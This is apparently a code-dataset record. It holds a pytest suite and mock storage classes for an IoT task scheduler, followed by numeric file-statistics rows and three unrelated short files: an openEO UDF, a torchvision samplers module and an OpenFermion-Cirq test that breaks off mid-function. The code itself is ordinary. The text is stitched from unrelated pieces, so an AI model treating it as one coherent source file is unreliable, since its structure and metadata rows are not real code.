schedule_row = scheduler._ScheduleRow(
id=schedule_id,
name='Test Schedule',
type=Schedule.Type.TIMED,
day=0,
time=0,
repeat=datetime.timedelta(seconds=30),
repeat_seconds=30,
exclusive=False,
enabled=True,
process_name='TestProcess')
# WHEN
# THEN
with pytest.raises(ValueError) as ex:
temp_schedule = scheduler._schedule_row_to_schedule(schedule_id, schedule_row)
temp_schedule.name = None
await scheduler.save_schedule(temp_schedule)
del temp_schedule
assert str(ex).endswith("name can not be empty")
with pytest.raises(ValueError) as ex:
temp_schedule = scheduler._schedule_row_to_schedule(schedule_id, schedule_row)
temp_schedule.name = ""
await scheduler.save_schedule(temp_schedule)
del temp_schedule
assert str(ex).endswith("name can not be empty")
with pytest.raises(ValueError) as ex:
temp_schedule = scheduler._schedule_row_to_schedule(schedule_id, schedule_row)
temp_schedule.repeat = 1234
await scheduler.save_schedule(temp_schedule)
del temp_schedule
assert str(ex).endswith('repeat must be of type datetime.timedelta')
with pytest.raises(ValueError) as ex:
temp_schedule = scheduler._schedule_row_to_schedule(schedule_id, schedule_row)
temp_schedule.exclusive = None
await scheduler.save_schedule(temp_schedule)
del temp_schedule
assert str(ex).endswith('exclusive can not be None')
with pytest.raises(ValueError) as ex:
temp_schedule = scheduler._schedule_row_to_schedule(schedule_id, schedule_row)
temp_schedule.time = 1234
await scheduler.save_schedule(temp_schedule)
del temp_schedule
assert str(ex).endswith('time must be of type datetime.time')
with pytest.raises(ValueError) as ex:
temp_schedule = scheduler._schedule_row_to_schedule(schedule_id, schedule_row)
temp_schedule.day = 0
temp_schedule.time = datetime.time()
await scheduler.save_schedule(temp_schedule)
del temp_schedule
assert str(ex).endswith('day must be between 1 and 7')
@pytest.mark.asyncio
@pytest.mark.skip(reason="To be done")
async def test_remove_service_from_task_processes(self):
pass
@pytest.mark.asyncio
async def test_disable_schedule(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
mocker.patch.object(scheduler, '_schedule_first_task')
await scheduler._get_schedules()
mocker.patch.object(scheduler, '_ready', True)
mocker.patch.object(scheduler, '_task_processes')
audit_logger = mocker.patch.object(AuditLogger, 'information', return_value=asyncio.ensure_future(mock_task()))
log_info = mocker.patch.object(scheduler._logger, "info")
sch_id = uuid.UUID("2b614d26-760f-11e7-b5a5-be2e44b06b34") # OMF to PI North
# WHEN
status, message = await scheduler.disable_schedule(sch_id)
# THEN
assert status is True
assert message == "Schedule successfully disabled"
assert (scheduler._schedules[sch_id]).id == sch_id
assert (scheduler._schedules[sch_id]).enabled is False
assert 2 == log_info.call_count
calls = [call('No Task running for Schedule %s', '2b614d26-760f-11e7-b5a5-be2e44b06b34'),
call("Disabled Schedule '%s/%s' process '%s'\n", 'OMF to PI north',
'2b614d26-760f-11e7-b5a5-be2e44b06b34', 'North Readings to PI')]
log_info.assert_has_calls(calls)
assert 1 == audit_logger.call_count
calls = [call('SCHCH', {'schedule': {'name': 'OMF to PI north', 'repeat': 30.0, 'enabled': False,
'type': Schedule.Type.INTERVAL, 'exclusive': True,
'processName': 'North Readings to PI'}})]
audit_logger.assert_has_calls(calls, any_order=True)
@pytest.mark.asyncio
async def test_disable_schedule_wrong_schedule_id(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
mocker.patch.object(scheduler, '_schedule_first_task')
await scheduler._get_schedules()
mocker.patch.object(scheduler, '_ready', True)
mocker.patch.object(scheduler, '_task_processes')
log_exception = mocker.patch.object(scheduler._logger, "exception")
random_schedule_id = uuid.uuid4()
# WHEN
await scheduler.disable_schedule(random_schedule_id)
# THEN
log_params = "No such Schedule %s", str(random_schedule_id)
log_exception.assert_called_with(*log_params)
@pytest.mark.asyncio
async def test_disable_schedule_already_disabled(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
mocker.patch.object(scheduler, '_schedule_first_task')
await scheduler._get_schedules()
mocker.patch.object(scheduler, '_ready', True)
mocker.patch.object(scheduler, '_task_processes')
log_info = mocker.patch.object(scheduler._logger, "info")
sch_id = uuid.UUID("d1631422-9ec6-11e7-abc4-cec278b6b50a") # backup
# WHEN
status, message = await scheduler.disable_schedule(sch_id)
# THEN
assert status is True
assert message == "Schedule {} already disabled".format(str(sch_id))
assert (scheduler._schedules[sch_id]).id == sch_id
assert (scheduler._schedules[sch_id]).enabled is False
log_params = "Schedule %s already disabled", str(sch_id)
log_info.assert_called_with(*log_params)
@pytest.mark.asyncio
async def test_enable_schedule(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
sch_id = uuid.UUID("d1631422-9ec6-11e7-abc4-cec278b6b50a") # backup
queue_task = mocker.patch.object(scheduler, 'queue_task', return_value=asyncio.ensure_future(mock_task()))
audit_logger = mocker.patch.object(AuditLogger, 'information', return_value=asyncio.ensure_future(mock_task()))
# WHEN
status, message = await scheduler.enable_schedule(sch_id)
# THEN
assert status is True
assert message == "Schedule successfully enabled"
assert (scheduler._schedules[sch_id]).id == sch_id
assert (scheduler._schedules[sch_id]).enabled is True
assert 1 == queue_task.call_count
calls = [call("Enabled Schedule '%s/%s' process '%s'\n", 'backup hourly', 'd1631422-9ec6-11e7-abc4-cec278b6b50a', 'backup')]
log_info.assert_has_calls(calls, any_order=True)
assert 1 == audit_logger.call_count
calls = [call('SCHCH', {'schedule': {'name': 'backup hourly', 'type': Schedule.Type.INTERVAL, 'processName': 'backup', 'exclusive': True, 'repeat': 3600.0, 'enabled': True}})]
audit_logger.assert_has_calls(calls, any_order=True)
@pytest.mark.asyncio
async def test_enable_schedule_already_enabled(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
sch_id = uuid.UUID("ada12840-68d3-11e7-907b-a6006ad3dba0") #Coap
mocker.patch.object(scheduler, 'queue_task', return_value=asyncio.ensure_future(mock_task()))
# WHEN
status, message = await scheduler.enable_schedule(sch_id)
# THEN
assert status is True
assert message == "Schedule is already enabled"
assert (scheduler._schedules[sch_id]).id == sch_id
assert (scheduler._schedules[sch_id]).enabled is True
log_params = "Schedule %s already enabled", str(sch_id)
log_info.assert_called_with(*log_params)
@pytest.mark.asyncio
async def test_enable_schedule_wrong_schedule_id(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
random_schedule_id = uuid.uuid4()
# WHEN
await scheduler.enable_schedule(random_schedule_id)
# THEN
log_params = "No such Schedule %s", str(random_schedule_id)
log_exception.assert_called_with(*log_params)
@pytest.mark.asyncio
async def test_queue_task(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
mocker.patch.object(scheduler, '_schedule_first_task')
# log_info = mocker.patch.object(scheduler._logger, "info")
await scheduler._get_schedules()
sch_id = uuid.UUID("cea17db8-6ccc-11e7-907b-a6006ad3dba0") # backup
mocker.patch.object(scheduler, '_ready', True)
mocker.patch.object(scheduler, '_resume_check_schedules')
# Assert that there is no task queued for this schedule at first
with pytest.raises(KeyError) as excinfo:
assert scheduler._schedule_executions[sch_id] is True
# WHEN
await scheduler.queue_task(sch_id)
# THEN
assert isinstance(scheduler._schedule_executions[sch_id], scheduler._ScheduleExecution)
# log_params = "Queued schedule '%s' for execution", 'purge'
# log_info.assert_called_with(*log_params)
@pytest.mark.asyncio
async def test_queue_task_schedule_not_found(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
mocker.patch.object(scheduler, '_schedule_first_task')
mocker.patch.object(scheduler, '_ready', True)
mocker.patch.object(scheduler, '_resume_check_schedules')
# WHEN
# THEN
with pytest.raises(ScheduleNotFoundError) as excinfo:
await scheduler.queue_task(uuid.uuid4())
@pytest.mark.asyncio
async def test_delete_schedule(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
sch_id = uuid.UUID("d1631422-9ec6-11e7-abc4-cec278b6b50a") # backup
await scheduler._get_schedules()
# Confirm no. of schedules
assert len(scheduler._storage_async.schedules) == len(scheduler._schedules)
mocker.patch.object(scheduler, '_ready', True)
# WHEN
# Now delete schedule
await scheduler.delete_schedule(sch_id)
# THEN
# Now confirm there is one schedule less
assert len(scheduler._storage_async.schedules) - 1 == len(scheduler._schedules)
@pytest.mark.asyncio
async def test_delete_schedule_enabled_schedule(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
sch_id = uuid.UUID("ada12840-68d3-11e7-907b-a6006ad3dba0") #Coap
await scheduler._get_schedules()
mocker.patch.object(scheduler, '_ready', True)
# Confirm there are 14 schedules
assert len(scheduler._storage_async.schedules) == len(scheduler._schedules)
# WHEN
# Now delete schedule
with pytest.raises(RuntimeWarning):
await scheduler.delete_schedule(sch_id)
# THEN
# Now confirm no schedule is deleted
assert len(scheduler._storage_async.schedules) == len(scheduler._schedules)
assert 1 == log_exception.call_count
log_params = 'Attempt to delete an enabled Schedule %s. Not deleted.', str(sch_id)
log_exception.assert_called_with(*log_params)
@pytest.mark.asyncio
async def test_delete_schedule_exception(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
log_debug = mocker.patch.object(scheduler._logger, 'debug', side_effect=Exception())
sch_id = uuid.UUID("d1631422-9ec6-11e7-abc4-cec278b6b50a") # backup
# WHEN
# THEN
with pytest.raises(ScheduleNotFoundError) as excinfo:
await scheduler.delete_schedule(uuid.uuid4())
@pytest.mark.asyncio
async def test_delete_schedule_not_found(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
# WHEN
# THEN
with pytest.raises(ScheduleNotFoundError) as excinfo:
await scheduler.delete_schedule(uuid.uuid4())
@pytest.mark.asyncio
async def test_get_running_tasks(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
# Assert that there is no task queued for schedule
with pytest.raises(KeyError) as excinfo:
assert scheduler._schedule_executions[schedule.id] is True
# Now queue task and assert that the task has been queued
await scheduler.queue_task(schedule.id)
assert isinstance(scheduler._schedule_executions[schedule.id], scheduler._ScheduleExecution)
# Confirm that no task has started yet
assert 0 == len(scheduler._schedule_executions[schedule.id].task_processes)
await scheduler._start_task(schedule)
# Confirm that task has started
assert 1 == len(scheduler._schedule_executions[schedule.id].task_processes)
# WHEN
tasks = await scheduler.get_running_tasks()
# THEN
assert 1 == len(tasks)
assert schedule.process_name == tasks[0].process_name
assert tasks[0].reason is None
assert tasks[0].state == Task.State.RUNNING
assert tasks[0].cancel_requested is None
assert tasks[0].start_time is not None
assert tasks[0].end_time is None
assert tasks[0].exit_code is None
@pytest.mark.asyncio
async def test_get_task(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
# Assert that there is no North task queued for schedule
with pytest.raises(KeyError) as excinfo:
assert scheduler._schedule_executions[schedule.id] is True
# Now queue task and assert that the North task has been queued
await scheduler.queue_task(schedule.id)
assert isinstance(scheduler._schedule_executions[schedule.id], scheduler._ScheduleExecution)
# Confirm that no task has started yet
assert 0 == len(scheduler._schedule_executions[schedule.id].task_processes)
await scheduler._start_task(schedule)
# Confirm that task has started
assert 1 == len(scheduler._schedule_executions[schedule.id].task_processes)
task_id = list(scheduler._schedule_executions[schedule.id].task_processes.keys())[0]
# WHEN
task = await scheduler.get_task(task_id)
# THEN
assert schedule.process_name == task.process_name
assert task.reason is ''
assert task.state is not None
assert task.cancel_requested is None
assert task.start_time is not None
assert task.end_time is not None
assert task.exit_code is '0'
@pytest.mark.skip("Need a suitable fixture")
@pytest.mark.asyncio
async def test_get_task_not_found(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
# WHEN
# THEN
with pytest.raises(TaskNotFoundError) as excinfo:
tasks = await scheduler.get_task(uuid.uuid4())
@pytest.mark.asyncio
async def test_get_task_exception(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
log_debug = mocker.patch.object(scheduler._logger, 'debug', side_effect=Exception())
# WHEN
# THEN
task_id = uuid.uuid4()
with pytest.raises(Exception) as excinfo:
await scheduler.get_task(task_id)
# THEN
payload = {"return": ["id", "process_name", "schedule_name", "state", {"alias": "start_time", "format": "YYYY-MM-DD HH24:MI:SS.MS", "column": "start_time"}, {"alias": "end_time", "format": "YYYY-MM-DD HH24:MI:SS.MS", "column": "end_time"}, "reason", "exit_code"], "where": {"column": "id", "condition": "=", "value": str(task_id)}}
args, kwargs = log_exception.call_args
assert 'Query failed: %s' == args[0]
p = json.loads(args[1])
assert payload == p
@pytest.mark.asyncio
async def test_get_tasks(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
# Assert that there is no North task queued for schedule
with pytest.raises(KeyError) as excinfo:
assert scheduler._schedule_executions[schedule.id] is True
# Now queue task and assert that the North task has been queued
await scheduler.queue_task(schedule.id)
assert isinstance(scheduler._schedule_executions[schedule.id], scheduler._ScheduleExecution)
# Confirm that no task has started yet
assert 0 == len(scheduler._schedule_executions[schedule.id].task_processes)
await scheduler._start_task(schedule)
# Confirm that task has started
assert 1 == len(scheduler._schedule_executions[schedule.id].task_processes)
task_id = list(scheduler._schedule_executions[schedule.id].task_processes.keys())[0]
# WHEN
tasks = await scheduler.get_tasks()
# THEN
assert schedule.process_name == tasks[0].process_name
assert tasks[0].reason is ''
assert tasks[0].state is not None
assert tasks[0].cancel_requested is None
assert tasks[0].start_time is not None
assert tasks[0].end_time is not None
assert tasks[0].exit_code is '0'
@pytest.mark.asyncio
async def test_get_tasks_exception(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
log_debug = mocker.patch.object(scheduler._logger, 'debug', side_effect=Exception())
# WHEN
with pytest.raises(Exception) as excinfo:
tasks = await scheduler.get_tasks()
# THEN
payload = {"return": ["id", "process_name", "schedule_name", "state", {"alias": "start_time", "column": "start_time", "format": "YYYY-MM-DD HH24:MI:SS.MS"}, {"alias": "end_time", "column": "end_time", "format": "YYYY-MM-DD HH24:MI:SS.MS"}, "reason", "exit_code"], "limit": 100}
args, kwargs = log_exception.call_args
assert 'Query failed: %s' == args[0]
p = json.loads(args[1])
assert payload == p
@pytest.mark.asyncio
async def test_cancel_task_all_ok(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
# Assert that there is no task queued for schedule
with pytest.raises(KeyError) as excinfo:
assert scheduler._schedule_executions[schedule.id] is True
# Now queue task and assert that the task has been queued
await scheduler.queue_task(schedule.id)
assert isinstance(scheduler._schedule_executions[schedule.id], scheduler._ScheduleExecution)
# Confirm that no task has started yet
assert 0 == len(scheduler._schedule_executions[schedule.id].task_processes)
await scheduler._start_task(schedule)
# Confirm that task has started
assert 1 == len(scheduler._schedule_executions[schedule.id].task_processes)
task_id = list(scheduler._schedule_executions[schedule.id].task_processes.keys())[0]
# Confirm that cancel request has not been made
assert scheduler._schedule_executions[schedule.id].task_processes[task_id].cancel_requested is None
# WHEN
await scheduler.cancel_task(task_id)
# THEN
assert scheduler._schedule_executions[schedule.id].task_processes[task_id].cancel_requested is not None
assert 2 == log_info.call_count
# args, kwargs = log_info.call_args_list[0]
# assert ("Queued schedule '%s' for execution", 'OMF to PI north') == args
args, kwargs = log_info.call_args_list[0]
assert "Process started: Schedule '%s' process '%s' task %s pid %s, %s running tasks\n%s" in args
assert 'OMF to PI north' in args
assert 'North Readings to PI' in args
args, kwargs = log_info.call_args_list[1]
assert "Stopping process: Schedule '%s' process '%s' task %s pid %s\n%s" in args
assert 'OMF to PI north' in args
assert 'North Readings to PI' in args
@pytest.mark.asyncio
async def test_cancel_task_exception(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
# WHEN
# THEN
with pytest.raises(TaskNotRunningError) as excinfo:
await scheduler.cancel_task(uuid.uuid4())
@pytest.mark.asyncio
async def test_not_ready_and_paused(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
mocker.patch.object(scheduler, '_ready', False)
mocker.patch.object(scheduler, '_paused', True)
# WHEN
# THEN
with pytest.raises(NotReadyError) as excinfo:
await scheduler.start()
with pytest.raises(NotReadyError) as excinfo:
await scheduler.get_scheduled_processes()
with pytest.raises(NotReadyError) as excinfo:
await scheduler.get_schedules()
with pytest.raises(NotReadyError) as excinfo:
await scheduler.get_schedule(uuid.uuid4())
with pytest.raises(NotReadyError) as excinfo:
await scheduler.save_schedule(Schedule(Schedule.Type.INTERVAL))
with pytest.raises(NotReadyError) as excinfo:
await scheduler.disable_schedule(uuid.uuid4())
with pytest.raises(NotReadyError) as excinfo:
await scheduler.enable_schedule(uuid.uuid4())
with pytest.raises(NotReadyError) as excinfo:
await scheduler.queue_task(uuid.uuid4())
with pytest.raises(NotReadyError) as excinfo:
await scheduler.delete_schedule(uuid.uuid4())
with pytest.raises(NotReadyError) as excinfo:
await scheduler.get_running_tasks()
with pytest.raises(NotReadyError) as excinfo:
await scheduler.cancel_task(uuid.uuid4())
@pytest.mark.skip("_terminate_child_processes() not fit for unit test.")
@pytest.mark.asyncio
async def test__terminate_child_processes(self, mocker):
pass
class MockStorage(StorageClientAsync):
def __init__(self, core_management_host=None, core_management_port=None):
super().__init__(core_management_host, core_management_port)
def _get_storage_service(self, host, port):
return {
"id": uuid.uuid4(),
"name": "Fledge Storage",
"type": "Storage",
"service_port": 9999,
"management_port": 9999,
"address": "0.0.0.0",
"protocol": "http"
}
class MockStorageAsync(StorageClientAsync):
schedules = [
{
"id": "cea17db8-6ccc-11e7-907b-a6006ad3dba0",
"process_name": "purge",
"schedule_name": "purge",
"schedule_type": 4,
"schedule_interval": "01:00:00",
"schedule_time": "",
"schedule_day": 0,
"exclusive": "t",
"enabled": "t"
},
{
"id": "2176eb68-7303-11e7-8cf7-a6006ad3dba0",
"process_name": "stats collector",
"schedule_name": "stats collection",
"schedule_type": 2,
"schedule_interval": "00:00:15",
"schedule_time": "00:00:15",
"schedule_day": 3,
"exclusive": "f",
"enabled": "t"
},
{
"id": "d1631422-9ec6-11e7-abc4-cec278b6b50a",
"process_name": "backup",
"schedule_name": "backup hourly",
"schedule_type": 3,
"schedule_interval": "01:00:00",
"schedule_time": "",
"schedule_day": 0,
"exclusive": "t",
"enabled": "f"
},
{
"id": "ada12840-68d3-11e7-907b-a6006ad3dba0",
"process_name": "COAP",
"schedule_name": "COAP listener south",
"schedule_type": 1,
"schedule_interval": "00:00:00",
"schedule_time": "",
"schedule_day": 0,
"exclusive": "t",
"enabled": "t"
},
{
"id": "2b614d26-760f-11e7-b5a5-be2e44b06b34",
"process_name": "North Readings to PI",
"schedule_name": "OMF to PI north",
"schedule_type": 3,
"schedule_interval": "00:00:30",
"schedule_time": "",
"schedule_day": 0,
"exclusive": "t",
"enabled": "t"
},
{
"id": "5d7fed92-fb9a-11e7-8c3f-9a214cf093ae",
"process_name": "North Readings to OCS",
"schedule_name": "OMF to OCS north",
"schedule_type": 3,
"schedule_interval": "1 day 00:00:40",
"schedule_time": "",
"schedule_day": 0,
"exclusive": "t",
"enabled": "f"
},
]
scheduled_processes = [
{
"name": "purge",
"script": [
"tasks/purge"
]
},
{
"name": "stats collector",
"script": [
"tasks/statistics"
]
},
{
"name": "backup",
"script": [
"tasks/backup_postgres"
]
},
{
"name": "COAP",
"script": [
"services/south"
]
},
{
"name": "North Readings to PI",
"script": [
"tasks/north",
"--stream_id",
"1",
"--debug_level",
"1"
]
},
{
"name": "North Readings to OCS",
"script": [
"tasks/north",
"--stream_id",
"4",
"--debug_level",
"1"
]
},
]
tasks = [
{
"id": "259b8570-65c1-4b92-8c62-e9642631a600",
"process_name": "North Readings to PI",
"state": 1,
"start_time": "2018-02-06 13:28:14.477868",
"end_time": "2018-02-06 13:28:14.856375",
"exit_code": "0",
"reason": ""
}
]
def __init__(self, core_management_host=None, core_management_port=None):
super().__init__(core_management_host, core_management_port)
def _get_storage_service(self, host, port):
return {
"id": uuid.uuid4(),
"name": "Fledge Storage",
"type": "Storage",
"service_port": 9999,
"management_port": 9999,
"address": "0.0.0.0",
"protocol": "http"
}
@classmethod
async def insert_into_tbl(cls, table_name, payload):
pass
@classmethod
async def update_tbl(cls, table_name, payload):
# Only valid for test_save_schedule_update
if table_name == "schedules":
return {"count": 1}
@classmethod
async def delete_from_tbl(cls, table_name, condition=None):
pass
@classmethod
async def query_tbl_with_payload(cls, table_name, query_payload):
if table_name == 'tasks':
return {
"count": len(MockStorageAsync.tasks),
"rows": MockStorageAsync.tasks
}
@classmethod
async def query_tbl(cls, table_name, query=None):
if table_name == 'schedules':
return {
"count": len(MockStorageAsync.schedules),
"rows": MockStorageAsync.schedules
}
if table_name == 'scheduled_processes':
return {
"count": len(MockStorageAsync.scheduled_processes),
"rows": MockStorageAsync.scheduled_processes
}
| 42.621555 | 339 | 0.652936 | 8,013 | 69,601 | 5.407088 | 0.056658 | 0.030212 | 0.04316 | 0.058809 | 0.848224 | 0.807903 | 0.781337 | 0.760565 | 0.726637 | 0.695617 | 0 | 0.020023 | 0.252295 | 69,601 | 1,632 | 340 | 42.647672 | 0.812532 | 0.058232 | 0 | 0.64881 | 0 | 0.002551 | 0.114192 | 0.02399 | 0 | 0 | 0 | 0.000613 | 0.179422 | 1 | 0.006803 | false | 0.005102 | 0.011054 | 0.005102 | 0.034864 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
7ca89ca7169c0f1670fef9182b15d74e96bdbeae
| 131 |
py
|
Python
|
tests/data/udf_noop.py
|
Open-EO/openeo-geopyspark-driver
|
afd5902f426d2aa456d70ed6f2d51b6907de1cab
|
[
"Apache-2.0"
] | 12 |
2018-03-22T15:02:24.000Z
|
2022-03-30T20:13:29.000Z
|
tests/data/udf_noop.py
|
Open-EO/openeo-geopyspark-driver
|
afd5902f426d2aa456d70ed6f2d51b6907de1cab
|
[
"Apache-2.0"
] | 116 |
2018-09-27T17:17:14.000Z
|
2022-03-30T18:32:29.000Z
|
tests/data/udf_noop.py
|
Open-EO/openeo-geopyspark-driver
|
afd5902f426d2aa456d70ed6f2d51b6907de1cab
|
[
"Apache-2.0"
] | 3 |
2019-06-28T15:44:32.000Z
|
2021-10-30T07:05:54.000Z
|
from openeo.udf import XarrayDataCube
def apply_datacube(cube: XarrayDataCube, context: dict) -> XarrayDataCube:
return cube
| 21.833333 | 74 | 0.78626 | 15 | 131 | 6.8 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145038 | 131 | 5 | 75 | 26.2 | 0.910714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 |
0
| 6 |
861a029a9ec9483f45fb602ca0d783eedc1d7f90
| 161 |
py
|
Python
|
torchvision/datasets/samplers/__init__.py
|
yoshitomo-matsubara/vision
|
03d11338f3faf94a0749549912593ddb8b70be17
|
[
"BSD-3-Clause"
] | 12,063 |
2017-01-18T19:58:38.000Z
|
2022-03-31T23:08:44.000Z
|
torchvision/datasets/samplers/__init__.py
|
yoshitomo-matsubara/vision
|
03d11338f3faf94a0749549912593ddb8b70be17
|
[
"BSD-3-Clause"
] | 4,673 |
2017-01-18T21:30:03.000Z
|
2022-03-31T20:58:33.000Z
|
torchvision/datasets/samplers/__init__.py
|
yoshitomo-matsubara/vision
|
03d11338f3faf94a0749549912593ddb8b70be17
|
[
"BSD-3-Clause"
] | 7,132 |
2017-01-18T18:12:23.000Z
|
2022-03-31T21:19:10.000Z
|
from .clip_sampler import DistributedSampler, UniformClipSampler, RandomClipSampler
__all__ = ("DistributedSampler", "UniformClipSampler", "RandomClipSampler")
| 40.25 | 83 | 0.838509 | 11 | 161 | 11.818182 | 0.727273 | 0.553846 | 0.815385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074534 | 161 | 3 | 84 | 53.666667 | 0.872483 | 0 | 0 | 0 | 0 | 0 | 0.329193 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 6 |
864c964912d3ec24af5b6c8c081c0833e7bd9b90
| 9,845 |
py
|
Python
|
openfermioncirq/variational/ansatzes/default_initial_params_test.py
|
viathor/OpenFermion-Cirq
|
b4b7f8d82c40f0a6282873b5d2867e9d8778cea6
|
[
"Apache-2.0"
] | null | null | null |
openfermioncirq/variational/ansatzes/default_initial_params_test.py
|
viathor/OpenFermion-Cirq
|
b4b7f8d82c40f0a6282873b5d2867e9d8778cea6
|
[
"Apache-2.0"
] | null | null | null |
openfermioncirq/variational/ansatzes/default_initial_params_test.py
|
viathor/OpenFermion-Cirq
|
b4b7f8d82c40f0a6282873b5d2867e9d8778cea6
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy
import pytest
import cirq
import openfermion
from openfermioncirq import (
HamiltonianObjective,
LowRankTrotterAnsatz,
SplitOperatorTrotterAnsatz,
SwapNetworkTrotterAnsatz,
SwapNetworkTrotterHubbardAnsatz,
VariationalStudy,
prepare_gaussian_state,
simulate_trotter)
from openfermioncirq.trotter import (
LINEAR_SWAP_NETWORK, LOW_RANK, LowRankTrotterAlgorithm, SPLIT_OPERATOR)
# 4-qubit random DiagonalCoulombHamiltonian
diag_coul_hamiltonian = openfermion.random_diagonal_coulomb_hamiltonian(
4, real=True, seed=47141)
# 4-qubit H2 2-2 with bond length 0.7414
bond_length = 0.7414
geometry = [('H', (0., 0., 0.)), ('H', (0., 0., bond_length))]
h2_hamiltonian = openfermion.load_molecular_hamiltonian(
geometry, 'sto-3g', 1, format(bond_length), 2, 2)
# 4-qubit LiH 2-2 with bond length 1.45
bond_length = 1.45
geometry = [('Li', (0., 0., 0.)), ('H', (0., 0., bond_length))]
lih_hamiltonian = openfermion.load_molecular_hamiltonian(
geometry, 'sto-3g', 1, format(bond_length), 2, 2)
@pytest.mark.parametrize(
'ansatz, trotter_algorithm, order, hamiltonian, atol', [
(SwapNetworkTrotterAnsatz(diag_coul_hamiltonian, iterations=1),
LINEAR_SWAP_NETWORK, 1, diag_coul_hamiltonian, 5e-5),
(SplitOperatorTrotterAnsatz(diag_coul_hamiltonian, iterations=1),
SPLIT_OPERATOR, 1, diag_coul_hamiltonian, 5e-5),
(LowRankTrotterAnsatz(h2_hamiltonian, iterations=1),
LOW_RANK, 0, h2_hamiltonian, 5e-5),
(LowRankTrotterAnsatz(lih_hamiltonian, iterations=1, final_rank=3),
LowRankTrotterAlgorithm(final_rank=3), 0, lih_hamiltonian, 5e-5),
(SwapNetworkTrotterHubbardAnsatz(2, 2, 1.0, 4.0, iterations=1),
LINEAR_SWAP_NETWORK, 1,
openfermion.get_diagonal_coulomb_hamiltonian(
openfermion.reorder(
openfermion.fermi_hubbard(2, 2, 1.0, 4.0),
openfermion.up_then_down)
),
5e-5)
])
def test_trotter_ansatzes_default_initial_params_iterations_1(
ansatz, trotter_algorithm, order, hamiltonian, atol):
"""Check that a Trotter ansatz with one iteration and default parameters
is consistent with time evolution with one Trotter step."""
objective = HamiltonianObjective(hamiltonian)
qubits = ansatz.qubits
if isinstance(hamiltonian, openfermion.DiagonalCoulombHamiltonian):
one_body = hamiltonian.one_body
elif isinstance(hamiltonian, openfermion.InteractionOperator):
one_body = hamiltonian.one_body_tensor
if isinstance(ansatz, SwapNetworkTrotterHubbardAnsatz):
occupied_orbitals = (range(len(qubits)//4), range(len(qubits)//4))
else:
